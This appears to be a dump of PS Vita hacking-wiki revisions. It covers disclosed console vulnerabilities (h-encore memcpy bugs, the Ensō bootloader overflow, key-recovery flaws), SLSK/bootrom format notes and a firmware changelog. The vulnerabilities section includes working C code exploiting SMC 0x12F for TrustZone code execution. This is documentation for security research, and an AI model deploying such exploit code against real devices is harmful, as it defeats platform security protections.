ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== memcpy bugs (h-encore kernel exploit) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparizon as signed integer ====<br />
<br />
At some point in memcpy function, the length is compared as signed integer. Hence a negative length will simply bypass the copy loop.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. We can mod eMMC MBR to change block size. But yifan was trying to exploit it with an adjacent malloc(controlled_size) and couldn't find a way so just left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx find the way to exploit the buffer overflow. He discovers a logic flaw related to error code propagation in NSBL. A function does not check a error return: if it did then the corrupted value in buffer overflow would not have been used. And later on the field that was written was used in a separate call.<br />
<br />
It so allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
=== SMC 0x12F does not validate arguments -> TrustZone level arbitrary code execution ===<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
(2017-01-01) SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table).<br />
<br />
This results in TrustZone level arbitrary code execution.<br />
<br />
It was patched somewhere around after 1.80 before 2.10.<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [https://pastebin.com/59pe8jBg there].<br />
<br />
Example code exploiting this vulnerability:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
Fixed in firmware 1.80<br />
(2017-02-18) To be disclosed.<br />
(2018-12-29) Disclosed at 35C3<br />
<br />
https://twitter.com/pomfpomfpomf3/status/832806488221446145<br />
<br />
<pre><br />
octopus exploit<br />
<br />
.---. ,,<br />
,, / \ ;,,'<br />
;, ; ( o o ) ; ;<br />
;,';,,, \ \/ / ,; ;<br />
,,, ;,,,,;;,` '-,;'''',,,'<br />
;,, ;,, ,,,, ,; ,,,'';;,,;''';<br />
;,,,; ~~' '';,,''',,;'''' <br />
</pre><br />
<br />
(I copied the octopus from an ASCII art page: http://ascii.co.uk/art/octopus)<br />
<br />
=== To be disclosed ===<br />
<br />
(2017-02-23) To be disclosed.<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=SLSK&diff=10540SLSK2019-02-02T20:15:27Z<p>Xyz: </p>
<hr />
<div><br />
{| class="wikitable"<br />
|-<br />
! Offset !! Size !! Description<br />
|-<br />
| 0x0 || 0x4 || <code>0x64B2C8E5</code> magic<br />
|-<br />
| 0x4 || 0x4 || Offset to code<br />
|-<br />
| 0x8 || 0x4 || Size of plaintext version string, 0 on 0.931, 0x10 on other<br />
|-<br />
| 0xC || 0x4 || Size of unknown block, only seen as 0<br />
|-<br />
| 0x10 || 0x4 || Code size<br />
|-<br />
| 0x14 || 0x2 || AES key revision, possible values 0 to 5<br />
|-<br />
| 0x16 || 0x2 || Public key revision, possible values 0 to 15<br />
|-<br />
| 0x18 || 0x8 || Unknown/zero<br />
|-<br />
| 0x20 || 0x20 || sha256 hash of decrypted body<br />
|-<br />
| 0x40 || 0x10 || Version in ASCII, not present on 0.931<br />
|-<br />
| 0x50 (0x40 on 0.931) || 0x90 || Zero<br />
|-<br />
| 0xE0 (0xD0 on 0.931) || Until Data || Encrypted Header<br />
|-<br />
|}<br />
<br />
== Trailer ==<br />
<br />
The last 0x340 bytes of each SLSK is not personalized and not used in any way.<br />
<br />
== Bootrom enc loading process ==<br />
<br />
=== Secret debug mode ===<br />
<br />
Before the ENC is loaded, there is a check for some secret mode. Note these two ports are used in regular syscon SPI-like communications. However, usually these two pins are used as part of the SPI-like protocol for signaling. But the bootrom does not use the SPI registers at all. It uses some registers that is never seen outside of bootrom. Even though it is logically separate from the SPI ports, it could be physically connected to the same pins although this is unconfirmed. Note that when the secret handshake passes and we are in secret mode, the MBR is read from the gamecard instead (with gamecard auth not enabled, so a regular SD card would work). Additionally, the personalization removal is done using keyslot 0x207 instead of 0x206 (see below) although it is not currently known if 0x207 is console-unique. All the signature checks and HMAC is still performed, so this secret mode cannot be used for running unsigned code. However, [[Glitching]] would still work when in the secret debug mode.<br />
<br />
<source lang="c"><br />
int is_debug_mode(void) {<br />
int res = 0;<br />
gpio_set_port_mode(0, 3, GPIO_MODE_OUT);<br />
if (gpio_port_read(0, 4)) {<br />
// this sets a bit in some f00d-only hardware<br />
// note this same reg is used to enable f00d reset from arm<br />
*(uint32_t *)0xE0020000 |= 0x10;<br />
// theory: mux on syscon SPI ports to connect to f00d directly<br />
<br />
// compute a challenge using true random numbers<br />
uint32_t challenge[4];<br />
challenge[0] = trng_read32();<br />
challenge[1] = trng_read32();<br />
challenge[2] = challenge[0];<br />
challenge[3] = challenge[1];<br />
<br />
// send challenge<br />
*(uint32_t *)0xE0000020 = challenge[0];<br />
*(uint32_t *)0xE0000024 = challenge[1];<br />
gpio_port_set(0, 3);<br />
<br />
// poll<br />
while (!gpio_port_read(0, 4));<br />
<br />
// get response<br />
uint32_t response[2];<br />
response[0] = *(uint32_t *)0xE0000028;<br />
response[1] = *(uint32_t *)0xE000002C;<br />
<br />
// clear regs<br />
*(uint32_t *)0xE0000028 = -1;<br />
*(uint32_t *)0xE000002C = -1;<br />
*(uint32_t *)0xE0000060 = -1; // maybe cached of 0xE0000020?<br />
*(uint32_t *)0xE0000064 = -1; // maybe cached of 0xE0000024?<br />
<br />
// end handshake<br />
gpio_port_clear(0, 3);<br />
<br />
// compute expected result<br />
uint32_t expected[4];<br />
if (bigmac_aes256_ecb_encrypt(expected, challenge, sizeof(challenge), g_debug_challenge_key) == 0) {<br />
// check result<br />
if (memcmp_timingsafe(expected, response, 8) == 0) {<br />
res = 1;<br />
}<br />
}<br />
memset(g_debug_challenge_key, 0, sizeof(g_debug_challenge_key));<br />
memset(challenge, 0, sizeof(challenge));<br />
memset(response, 0, sizeof(response));<br />
memset(expected, 0, sizeof(expected));<br />
} else {<br />
memset(g_debug_challenge_key, 0, sizeof(g_debug_challenge_key));<br />
}<br />
return res;<br />
}<br />
</source><br />
<br />
=== Remove personalization ===<br />
<br />
First, personalization layer is removed. It uses AES-128-CBC with a derived key and decrypts data at ENC+0xE0 (or ENC+0xD0 if there's no plaintext version) for size of code_size+0x1E0.<br />
<br />
There are two possible paths to derive the key used to remove personalization. Normally, the key is derived using keyslot 0x206. There's however an alternative path, triggered in secret debug mode, when instead the keyslot 0x207 is used with a different seed.<br />
<br />
Once personalization is removed, the source keys are locked down. Keyslots 0x9, 0x206, 0x207 are locked down completely (leaving only 0xA0 protection). However, keyslot 0x8 allows encryption, this lets update manager SM add personalization layer during update without having to derive the keys itself.<br />
<br />
=== Header RSA check ===<br />
<br />
A key is derived from keyslot 0x344 and put into keyslot 0x20. This key is then immediately used to calculate HMAC-SHA256 over enc header, excluding the RSA sig (typically 0x00 to 0x1C0).<br />
<br />
2 bytes are read from keyring slot 0x603 is read. This is the bitmask of allowed RSA public keys (0xFFFF on 1.692). If the mask is zero, a hardcoded RSA modulus is used. Otherwise, it checks enc rsa revision against the mask and if it's allowed, it gets the modulus from keyring RSA storage starting at keyslot 0x700.<br />
<br />
The signature is typically located at 0x1C0 and is 0x100 bytes. After calculating powmod, it checks the padding and compares previously calculated HMAC-SHA256 against the contents.<br />
<br />
Finally, it protects keyslots 0x700 to 0x77F to disable reading out the modulus.<br />
<br />
=== Metadata decryption and code verification ===<br />
<br />
Using keyslot 0x208+aes_key_revision and metadata buffer (0xE0 offset for 0x20 bytes) the code decryption key is derived and put into keyslot 10. Then, 5 more keys are derived in the same way, using seed data [0x100; 0x19F]. These 5 keys are put into keyslots 11, 12, 13, 14, 15.<br />
<br />
Keyslots 0x208, 0x209, 0x20A, 0x20B, 0x20C, 0x20D (all possible AES key revision keys) are protected.<br />
<br />
Data at [0x1A0; 0x1C0) is decrypted using keyslot 10. This is HMAC-SHA256 of the code segment. HMAC-SHA256 is calculated over the code segment using keyslot 0x20, then keyslot 0x20 is protected. Finally, the calculated hmac is compared to the decrypted one.<br />
<br />
=== Protecting the keys ===<br />
<br />
Some keys are protected, depending on bit flags buffer located right after plaintext version string (so, at offset 0x50). However, on the latest 3.68 enc it is all zeroes so no keys should be protected by this function (?)<br />
<br />
=== Decrypting code ===<br />
<br />
Code is decrypted using key 10 and a hard coded IV. Then, the key is protected.<br />
<br />
=== Clear ===<br />
<br />
The remainder (0x1C000 - code_sz) after the decrypted code is cleared with dmac. Dmac regs are also cleared.</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=MediaWiki:Sidebar&diff=10166MediaWiki:Sidebar2019-01-21T23:28:49Z<p>Xyz: </p>
<hr />
<div><br />
* navigation<br />
** mainpage|mainpage-description<br />
** recentchanges-url|recentchanges<br />
** randompage-url|randompage<br />
** helppage|help<br />
* Quick Links<br />
** Modules|Modules<br />
** Kernel|Kernel<br />
** System_Software|Software<br />
** Vulnerabilities|Vulnerabilities<br />
* SEARCH<br />
* TOOLBOX<br />
* LANGUAGES</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=10162System Software2019-01-20T21:45:42Z<p>Xyz: /* Version 3 */</p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixed problems which appeared in 1.65<br />
* [Settings]<br />
* The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Improved system stability<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists have been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and a ton of other vulns.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, it is now possible to transfer MPO files using a PlayStation 3 or PC using Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
* [near] can now gather information of surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
[Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
* Support for PlayStation Plus has been added.<br />
* Users can now connect their PlayStation Network account to Twitter.<br />
* [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now display videos with 1080 resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in UNO game. <br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in Dissidia Duodecim PSP game.<br />
* Closes JavaScript URL spoofing exploit in Browser.<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>09 September 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />''Pre-installed Only''<br><br />
First found on October 10, 2013<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
